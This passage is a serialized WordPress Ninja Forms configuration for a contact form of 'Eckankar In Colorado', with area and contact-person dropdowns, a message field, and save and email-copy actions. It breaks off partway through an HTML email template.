Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_146\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:14:\"listselect_146\";}s:2:\"id\";i:10;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Initiator-Marcie Tucker\";s:5:\"value\";s:23:\"Initiator-Marcie Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"ESA/Initiator-Barry Frost\";s:5:\"value\";s:25:\"esa-initiator-barry-frost\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"2\";}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:29:\"ESA/Initiator-Gardiner Tucker\";s:5:\"value\";s:29:\"ESA/Initiator-Gardiner Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"4\";}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166666321\";s:15:\"container_class\";s:8:\"one-half\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:14:\"listselect_149\";}s:2:\"id\";i:13;}i:7;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_150\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_150\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:14;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797373767\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"609\";}i:9;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_152\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_152\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:16;}i:10;a:2:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"HTML\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797370980\";}s:2:\"id\";s:3:\"610\";}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:32\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";}s:2:\"id\";i:5;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:32\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_144}\";s:13:\"email_subject\";s:34:\"Loveland Initiators and ESAâs\";s:13:\"email_message\";s:3376:\"<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td 